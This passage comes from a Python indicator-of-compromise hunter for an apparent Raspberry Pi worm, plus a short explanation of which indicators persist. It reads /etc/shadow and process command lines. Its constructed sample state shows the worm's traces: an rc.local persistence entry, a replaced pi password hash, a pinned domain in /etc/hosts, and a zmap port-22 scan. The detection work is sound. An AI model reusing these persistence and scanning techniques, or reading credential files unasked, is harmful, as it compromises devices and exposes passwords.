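    if COMPETITOR_DOMAIN in fs.get("/etc/hosts", ""):
        findings.append(("hosts", f"{COMPETITOR_DOMAIN} pinned in /etc/hosts"))
    for path in ARTIFACT_PATHS:
        if path in fs:
            findings.append(("artifact", f"{path} exists"))
    for cmd in cmdlines:
        if PROCESS_RE.search(cmd):
            findings.append(("process", cmd))
    return findings


def collect_live():
    """Read the watched files and /proc/*/cmdline on this host (root needed for /etc/shadow)."""
    fs, cmdlines = {}, []
    for path in WATCHED_FILES:
        try:
            with open(path, "r", errors="replace") as fh:
                fs[path] = fh.read()
        except OSError:
            pass
    for pid in filter(str.isdigit, os.listdir("/proc")):
        try:
            with open(f"/proc/{pid}/cmdline", "rb") as fh:
                cmdlines.append(fh.read().replace(b"\0", b" ").decode(errors="replace").strip())
        except OSError:
            pass
    return fs, cmdlines


# Constructed sample host state for a dry run. The key is not a real key, so its
# fingerprint is not on the watch list; the shadow hash keeps only the worm's salt.
CONSTRUCTED_KEY = "ssh-rsa " + base64.b64encode(b"constructed, not a real key blob").decode() + " ops@example"
SAMPLE_FS = {
    "/etc/rc.local": "#!/bin/sh -e\n/opt/kQ7xZp2a\nexit 0\n",
    "/root/.ssh/authorized_keys": CONSTRUCTED_KEY + "\n",
    "/etc/shadow": "root:*:19000:0:99999:7:::\npi:" + PI_HASH_PREFIX + "constructedRemainder:19000:0:99999:7:::\n",
    "/etc/hosts": "127.0.0.1 localhost\n127.0.0.1 bins.deutschland-zahlung.eu\n",
    "/opt/.r": "198.51.100.23\n",
}
SAMPLE_CMDLINES = ["/usr/sbin/sshd -D", "zmap -p 22 -o /tmp/tmp.Xy12 -n 100000", "/usr/bin/python3 app.py"]

if __name__ == "__main__":
    for category, detail in hunt(*collect_live()):
        print(f"[{category}] {detail}")
```

The /etc/hosts and /etc/shadow checks are the most durable of the set: the bot script and /tmp/public.pem are removed shortly after launch, and /opt/.r only exists once the host has infected someone else, whereas the pinned competitor domain and the replaced pi hash persist until the device is rebuilt.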